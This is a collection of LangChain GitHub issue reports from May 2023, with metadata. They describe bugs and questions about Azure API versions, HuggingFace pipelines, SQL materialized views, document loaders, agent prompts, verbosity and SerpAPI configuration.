### System Info (.venv) C:\Users\hbb9279\OpenAI\Files\10K\2019>python Python 3.11.3 (tags/v3.11.3:f3909b8, Apr 4 2023, 23:49:59) [MSC v.1934 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> langchain-0.0.162 import os import openai openai.api_type = "azure" openai.api_base = "https://<<deployment_id>>.openai.azure.com/" openai.api_version = "2023-03-15-preview" vectorstore = FAISS.from_documents(documents=documents, embedding = emb ) emb = OpenAIEmbeddings(chunk_size=1) openai.api_base, openai.api_version ('https://<<deployment_id>>.openai.azure.com/', '2022-12-01') Then when you try to use the functionality, it will fail with resource not found, because api_version 2022-12-01 doesn't support GPT-35-Turbo and GPT-4 😐 ### Who can help? @hwchase17 @vowelparrot @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os import openai openai.api_type = "azure" openai.api_version = "2023-03-15-preview" emb = OpenAIEmbeddings(chunk_size=1) openai.api_version >> '2022-12-01' ### Expected behavior The expectation is to keep the environment variables the same way that I defined them, without modifying them.
Azure OpenAIEmbeddings(chunk_size=1) is changing the API version of the openai module
https://api.github.com/repos/langchain-ai/langchain/issues/4352/comments
8
2023-05-08T18:08:59Z
2023-09-06T21:03:28Z
https://github.com/langchain-ai/langchain/issues/4352
1,700,692,794
4,352
[ "langchain-ai", "langchain" ]
### System Info Latest langchain version. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ValueError: Loading mosaicml/mpt-7b-chat requires you to execute the configuration file in that repo on your local machine. Make sure you have read the code there to avoid malicious use, then set the option `trust_remote_code=True` to remove this error. Adding `trust_remote_code":True` to model_kwargs allows you to download the models throws TypeError: transformers.pipelines.base.infer_framework_load_model() got multiple values for keyword argument 'trust_remote_code' later on after the download. lang_chain8.py ``` from langchain import HuggingFacePipeline llm = HuggingFacePipeline.from_model_id(model_id="mosaicml/mpt-7b-chat", task="text-generation", model_kwargs={"temperature":0.1, "trust_remote_code":True}) from langchain import PromptTemplate, LLMChain template = """Question: {question} Answer: Let's think step by step.""" prompt = PromptTemplate(template=template, input_variables=["question"]) llm_chain = LLMChain(prompt=prompt, llm=llm) question = "What is electroencephalography?" 
print(llm_chain.run(question)) ``` ``` python lang_chain8.py Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [01:07<00:00, 33.72s/it] Traceback (most recent call last): File "/Users/russellballestrini/git/flaskchat/lang_chain8.py", line 4, in <module> llm = HuggingFacePipeline.from_model_id(model_id="mosaicml/mpt-7b-chat", task="text-generation", model_kwargs={"temperature":0.1, "trust_remote_code": True}) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/Users/russellballestrini/git/flaskchat/env/lib/python3.11/site-packages/langchain/llms/huggingface_pipeline.py", line 118, in from_model_id pipeline = hf_pipeline( ^^^^^^^^^^^^ File "/Users/russellballestrini/git/flaskchat/env/lib/python3.11/site-packages/transformers/pipelines/__init__.py", line 779, in pipeline framework, model = infer_framework_load_model( ^^^^^^^^^^^^^^^^^^^^^^^^^^^ TypeError: transformers.pipelines.base.infer_framework_load_model() got multiple values for keyword argument 'trust_remote_code' ``` ### Expected behavior I expect to be able to run inference on any huggingface model even the untrusted ones.
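The TypeError has a simple shape that can be reproduced without transformers (a stand-in sketch): when `trust_remote_code` is placed in `model_kwargs` and the pipeline also passes it explicitly, the same keyword reaches one call twice:

```python
def load_model(model, trust_remote_code=False, **model_kwargs):
    """Stand-in for transformers' infer_framework_load_model."""
    return (model, trust_remote_code, model_kwargs)

model_kwargs = {"temperature": 0.1, "trust_remote_code": True}

# The pipeline also passes trust_remote_code explicitly, so the same
# keyword arrives twice and Python raises TypeError.
try:
    load_model("mpt-7b-chat", trust_remote_code=True, **model_kwargs)
    error = None
except TypeError as exc:
    error = str(exc)
```

Which is why moving the flag out of `model_kwargs` (so only one code path supplies it) is the usual shape of the fix.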
HuggingFacePipeline trust_remote_code:True allows download but not inference
https://api.github.com/repos/langchain-ai/langchain/issues/4351/comments
6
2023-05-08T18:01:54Z
2023-09-22T16:09:25Z
https://github.com/langchain-ai/langchain/issues/4351
1,700,680,363
4,351
[ "langchain-ai", "langchain" ]
### System Info When specifying a materialized view in include_tables, the following error occurs: include_tables {'table_name'} not found in database ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction include_tables=['table1', 'table2'] db = SQLDatabase.from_uri("postgresql://xxx:xxx@xxx:5432/xxx", include_tables=include_tables) ### Expected behavior Materialized views should be accessible.
Materialized Views not accessible
https://api.github.com/repos/langchain-ai/langchain/issues/4349/comments
8
2023-05-08T16:51:57Z
2024-07-19T13:43:53Z
https://github.com/langchain-ai/langchain/issues/4349
1,700,590,442
4,349
[ "langchain-ai", "langchain" ]
### Discussed in https://github.com/hwchase17/langchain/discussions/4341 <div type='discussions-op-text'> <sup>Originally posted by **mattia-bolognesi** May 8, 2023</sup> I have a problem when running this script; it basically gives an error on the ZeroShotAgent class: ``` prompt = ZeroShotAgent.create_prompt( tools, prefix=prefix, suffix=suffix, input_variables=["input", "chat_history", "agent_scratchpad"], ) ``` The error is: ``` "ValidationError: 1 validation error for PromptTemplate _root_ Invalid prompt schema; check for mismatched or missing input parameters. {'input', 'agent_scratchpad', 'chat_history'} (type=value_error)". ```</div>
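The validation error boils down to a set comparison that can be sketched without LangChain: collect the `{...}` fields a format-style template actually uses and compare them with the declared `input_variables` (illustrative only):

```python
from string import Formatter

def template_variables(template: str) -> set:
    """Fields a str.format-style template expects to be filled in."""
    return {field for _, field, _, _ in Formatter().parse(template) if field}

declared = {"input", "chat_history", "agent_scratchpad"}

good_suffix = "{chat_history}\nQuestion: {input}\n{agent_scratchpad}"
bad_suffix = "Question: {input}"  # prefix/suffix text missing two variables

good = template_variables(good_suffix)
bad = template_variables(bad_suffix)
```

When the combined prefix + examples + suffix text does not contain every declared variable (or contains extras), PromptTemplate raises exactly the `Invalid prompt schema` error shown above.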
Problem with ZeroShotAgent.create_prompt()
https://api.github.com/repos/langchain-ai/langchain/issues/4345/comments
1
2023-05-08T15:27:44Z
2023-09-10T16:20:07Z
https://github.com/langchain-ai/langchain/issues/4345
1,700,472,614
4,345
[ "langchain-ai", "langchain" ]
### System Info LangChain: 0.0.161 Platform: Ubuntu 22.04.2 LTS Python Version: 3.10.6 When trying to use the new OneDriveLoader, I get the below error. ``` Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/user/.cache/pypoetry/virtualenvs/test-r_fbvPX4-py3.10/lib/python3.10/site-packages/langchain/document_loaders/onedrive.py", line 223, in load account = self._auth() File "/home/user/.cache/pypoetry/virtualenvs/test-r_fbvPX4-py3.10/lib/python3.10/site-packages/langchain/document_loaders/onedrive.py", line 102, in _auth account = Account( NameError: name 'Account' is not defined. Did you mean: 'account'? ``` I believe the issue is with the Account import in onedrive.py: since `Account` is only imported during type checking, it's not available at runtime, yet an `Account` object is instantiated further down. https://github.com/hwchase17/langchain/blob/16e766376221ee8b514d78ae8c38e273eca30f25/langchain/document_loaders/onedrive.py#L17-L18 https://github.com/hwchase17/langchain/blob/16e766376221ee8b514d78ae8c38e273eca30f25/langchain/document_loaders/onedrive.py#L102-L110 ### Who can help? @hwchase17 / @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os from langchain.document_loaders import OneDriveLoader # assume O365_CLIENT_ID / O365_CLIENT_SECRET are also present loader = OneDriveLoader(drive_id=os.getenv('O365_DRIVE_ID')) documents = loader.load() print(documents) ### Expected behavior a list of printed documents
OneDriveLoader: NameError: name 'Account' is not defined. Did you mean: 'account'?
https://api.github.com/repos/langchain-ai/langchain/issues/4343/comments
8
2023-05-08T14:57:18Z
2023-11-13T16:09:26Z
https://github.com/langchain-ai/langchain/issues/4343
1,700,415,939
4,343
[ "langchain-ai", "langchain" ]
### System Info System: Linux Kernel: Linux version 5.15.0-1026-aws (buildd@lcy02-amd64-088) ( gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 ) Python version: 3.8.16 LangChain version: 0.0.157 ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Upon constructing the HuggingFaceEndpoint, when the API token is set as an environment variable (not passing to the constructor), the attribute ```huggingface_api_token``` will always be empty, causing a missing token in the request headers: ``` from dotenv import load_dotenv load_dotenv() llm = HuggingFaceEndpoint( endpoint_url="togethercomputer/RedPajama-INCITE-Instruct-7B-v0.1", task="text-generation" ) print(llm.huggingfacehub_api_token) print("What is the capital of France?") ``` Output: ``` None Traceback (most recent call last): File "research/red_pajama.py", line 58, in <module> print(llm("What is the capital of France?")) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 281, in __call__ self.generate([prompt], stop=stop, callbacks=callbacks) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 176, in generate raise e File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 170, in generate self._generate(prompts, stop=stop, run_manager=run_manager) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 377, in _generate self._call(prompt, stop=stop, run_manager=run_manager) File 
"/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/huggingface_endpoint.py", line 133, in _call raise ValueError( ValueError: Error raised by inference API: Authorization header is correct, but the token seems invalid ``` ValueError exception raised here: [https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/llms/huggingface_endpoint.py#L118](https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/llms/huggingface_endpoint.py#L118) ### Expected behavior huggingFaceEndpoint should send a valid POST request to inference API.
Empty API token in HuggingFaceEndpoint unless explicitly passed to Constructor
https://api.github.com/repos/langchain-ai/langchain/issues/4334/comments
6
2023-05-08T11:48:06Z
2024-02-11T16:20:22Z
https://github.com/langchain-ai/langchain/issues/4334
1,700,100,642
4,334
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi, we have recently been encountering breaking changes during development due to LangChain's daily releases. May I ask how you plan to handle this in the future, and how you recommend users deal with these compatibility issues? Thanks! For example, in LangChain version <=0.0.153 we import CallbackManager like this: ```from langchain.callbacks.base import CallbackManager``` but in the latest version the class has been moved to manager.py, which breaks our tests; we need to update the code to ```from langchain.callbacks.manager import CallbackManager``` to fix it ### Suggestion: _No response_
Issue: Compatibility issues with LangChain between different versions
https://api.github.com/repos/langchain-ai/langchain/issues/4332/comments
1
2023-05-08T11:06:34Z
2023-09-19T16:11:47Z
https://github.com/langchain-ai/langchain/issues/4332
1,700,049,036
4,332
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Argument `model_name` is the standard way of defining a model in LangChain's [ChatOpenAI](https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/chat_models/openai.py#L115). However, OpenAI uses `model` in their own [API](https://platform.openai.com/docs/api-reference/completions/create). To handle this discrepancy, LangChain transforms `model_name` into `model` [here](https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/chat_models/openai.py#L202). The problem is that, if you ignore model_name and use model in the LLM instantiation e.g. `ChatOpenAI(model=...)`, it still works! It works because model becomes part of `model_kwargs`, which takes precedence over the default `model_name` (which would be "gpt-3.5-turbo"). This leads to an inconsistency: the `model` can be anything (e.g. "gpt-4-0314"), but `model_name` will be the default value. This inconsistency won't cause any direct issue but can be problematic when you're trying to understand what models are actually being called and used. I'm raising this issue because I lost a couple of hours myself trying to understand what was happening. ### Suggestion: There are three ways to solve it: 1. Raise an error or warning if model is used as an argument and suggest using model_name instead 2. Raise a warning if model is defined differently from model_name 3. Change from model_name to model to make it consistent with OpenAI's API I think (3) is unfeasible due to the breaking change, but raising a warning seems low effort and safe enough.
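The precedence described is ordinary dict-merge behaviour, which a few lines show in isolation (a sketch of the mechanism, not LangChain's actual code):

```python
# Defaults carry model_name's value under the key "model";
# anything the caller smuggled in via model_kwargs is merged on top.
default_params = {"model": "gpt-3.5-turbo", "temperature": 0.7}
model_kwargs = {"model": "gpt-4-0314"}  # from ChatOpenAI(model=...)

params = {**default_params, **model_kwargs}
```

So the request goes out for gpt-4-0314 while the instance's `model_name` still reads "gpt-3.5-turbo", exactly the inconsistency reported.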
Issue: Model and model_name inconsistency in OpenAI LLMs such as ChatOpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4331/comments
0
2023-05-08T10:49:23Z
2023-05-08T23:37:37Z
https://github.com/langchain-ai/langchain/issues/4331
1,700,026,427
4,331
[ "langchain-ai", "langchain" ]
### System Info Python 3.11.2 Langchain 0.0.161 Debian GNU/Linux 12 (bookworm) ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [X] Async ### Reproduction How does verbosity work? I had my python scripts output verbose information, I mean all that green prompt-text when executing chains. All the constructors of LLMs and Chains have verbose=True in their constructors. But somewhat recently LangChain's behaviour changed and after doing a `pip install --upgrade langchain` my verbose output completely disappeared. Do you have some sort of changelog or documentation on this? I didn't find any. A small script still produces verbose output. But my project doesn't. I'm not sure what I'm doing differently. EDIT: Maybe I should add that I'm doing async calls. And feeding it my own prompts from a PromptTemplate.from_template("..."). Could be related to any of that?! EDIT2: Where does the green text even come from? I can see the chain calls a StdoutCallbackHandler. This fires and prints "Entering new ConversationChain chain..." as it's supposed to. But how do I debug the missing green text after that? It's not in the on_chain_start()... ### Expected behavior Verbose output is produced when setting verbose=True
Langchain isn't verbose any more [run_manager gets dropped]
https://api.github.com/repos/langchain-ai/langchain/issues/4329/comments
11
2023-05-08T09:43:07Z
2024-03-02T07:54:51Z
https://github.com/langchain-ai/langchain/issues/4329
1,699,909,725
4,329
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

Currently, the base URL of SerpAPI is hard-coded, while some other search services are configurable (e.g. Bing, via `BING_SEARCH_URL`). In some companies the original URL cannot be accessed directly, so we need to go through an nginx redirect proxy. For that, the base URL has to be configurable via an environment variable.

### Suggestion:

Make the SerpAPI base URL configurable via an environment variable.
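A minimal sketch of the suggested change, following the same pattern Bing search uses with `BING_SEARCH_URL`. The variable name `SERPAPI_BASE_URL` and the helper functions are assumptions for illustration, not an existing LangChain setting:

```python
import os
from urllib.parse import urlencode

DEFAULT_SERPAPI_BASE_URL = "https://serpapi.com/search"

def serpapi_base_url() -> str:
    # Hypothetical env var name, mirroring how BING_SEARCH_URL is read.
    return os.environ.get("SERPAPI_BASE_URL", DEFAULT_SERPAPI_BASE_URL)

def search_url(params: dict) -> str:
    """Build the request URL against the configurable base."""
    return f"{serpapi_base_url()}?{urlencode(params)}"

# With SERPAPI_BASE_URL unset, requests go to the public endpoint;
# setting it points them at e.g. an internal nginx proxy:
os.environ["SERPAPI_BASE_URL"] = "https://proxy.internal/serpapi/search"
print(search_url({"q": "langchain"}))  # https://proxy.internal/serpapi/search?q=langchain
```

Reading the variable at call time (rather than once at import) also lets tests and deployments switch endpoints without reloading the module.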
Issue: Can not configure serpapi base url via env
https://api.github.com/repos/langchain-ai/langchain/issues/4328/comments
2
2023-05-08T09:27:24Z
2023-05-15T21:25:26Z
https://github.com/langchain-ai/langchain/issues/4328
1,699,888,708
4,328
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise.

Hello,

While trying to import `from langchain.memory import ConversationBufferMemory` I am getting the error:

```
ModuleNotFoundError: No module named 'langchain.memory'

Traceback:
  File "c:\users\aviparna.biswas\appdata\local\programs\python\python37\lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 565, in _run_script
    exec(code, module.__dict__)
  File "D:\Python Projects\POC\Radium\Ana\app.py", line 8, in <module>
    from langchain.memory import ConversationBufferMemory
```

I have already installed langchain and it shows up in my packages.
ModuleNotFoundError: No module named 'langchain.memory'
https://api.github.com/repos/langchain-ai/langchain/issues/4327/comments
10
2023-05-08T08:09:09Z
2024-02-28T16:10:30Z
https://github.com/langchain-ai/langchain/issues/4327
1,699,755,334
4,327
[ "langchain-ai", "langchain" ]
### System Info

In langchain 0.0.161, if I call `S3DirectoryLoader(bucket, prefix)` where `prefix` is a "folder name", e.g. "documents/", you get an `IsADirectoryError: [Errno 21] Is a directory` exception.

It looks like the code filters the bucket objects, and the filter returns the files as well as the folder object itself. `S3FileLoader` then tries to download the folder, and that's what causes the exception:

```
s3 = boto3.resource("s3")
bucket = s3.Bucket(self.bucket)
docs = []
for obj in bucket.objects.filter(Prefix=self.prefix):
    loader = S3FileLoader(self.bucket, obj.key)
    docs.extend(loader.load())
```

### Who can help?

_No response_

### Information

- [ ] The official example notebooks/scripts
- [X] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Call `S3DirectoryLoader(bucket, prefix)` using a prefix that is a directory
2. See the exception being thrown

### Expected behavior

The documents inside the folder should be loaded. The folder itself should be ignored.
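One possible guard, sketched here as the idea rather than the actual LangChain patch, is to skip keys that end with "/", since S3 represents the "folder" placeholder object that way. Isolated from boto3 for illustration:

```python
def file_keys_only(keys):
    """Drop S3 'folder' placeholder keys, which end with a slash."""
    return [k for k in keys if not k.endswith("/")]

# The prefix filter returns the folder object itself plus the files under it:
listed = ["documents/", "documents/report.pdf", "documents/notes.txt"]
print(file_keys_only(listed))  # ['documents/report.pdf', 'documents/notes.txt']
```

In the loop above, the equivalent change would be `if obj.key.endswith("/"): continue` before constructing the `S3FileLoader`.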
S3DirectoryLoader throws IsADirectoryError when prefix is a directory
https://api.github.com/repos/langchain-ai/langchain/issues/4326/comments
7
2023-05-08T08:05:02Z
2024-02-13T16:16:53Z
https://github.com/langchain-ai/langchain/issues/4326
1,699,748,061
4,326
[ "langchain-ai", "langchain" ]
### System Info

We are following the Power BI Dataset Agent guide below to try to connect to a Power BI dashboard:

[Power BI Dataset Agent](https://python.langchain.com/en/latest/modules/agents/toolkits/examples/powerbi.html)

We are able to connect to the OpenAI API but are facing issues with the line of code below.

`powerbi=PowerBIDataset(dataset_id="<dataset_id>", table_names=['table1', 'table2'], credential=DefaultAzureCredential())`

Error:

> ConfigError: field "credential" not yet prepared so type is still a ForwardRef, you might need to call PowerBIDataset.update_forward_refs().

We tried searching for a solution but have had no luck so far. Is there any configuration we are missing? Can you share more details? Is there any specific configuration or access required on the Power BI side? Thanks in advance...

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

Same steps as mentioned in the official Power BI Dataset Agent documentation.

### Expected behavior

We should be able to connect to Power BI.
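The ConfigError comes from a pydantic field whose annotation is still an unresolved forward reference; the error message itself names the workaround, calling `PowerBIDataset.update_forward_refs()` (after importing `DefaultAzureCredential`) before instantiating. As a language-level illustration of what "resolving a forward ref" means, here is a plain-`typing` sketch, not pydantic or LangChain code:

```python
class Node:
    # At class-creation time "Node" is stored as a *string*, because the
    # class object does not exist yet. That string is the forward reference.
    next: "Node"

ann = Node.__annotations__["next"]
print(type(ann).__name__, repr(ann))  # str 'Node'

# Resolving the reference means evaluating the string in a namespace where
# the target class exists, which is what update_forward_refs() does for
# pydantic model fields:
resolved = eval(ann, {"Node": Node})
print(resolved is Node)  # True
```

In the reported case the `credential` field's annotation presumably cannot be resolved until `azure.identity.DefaultAzureCredential` has been imported, which is why ordering the import before `update_forward_refs()` matters.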
Power BI Dataset Agent Issue
https://api.github.com/repos/langchain-ai/langchain/issues/4325/comments
14
2023-05-08T07:57:11Z
2024-01-21T13:11:59Z
https://github.com/langchain-ai/langchain/issues/4325
1,699,733,507
4,325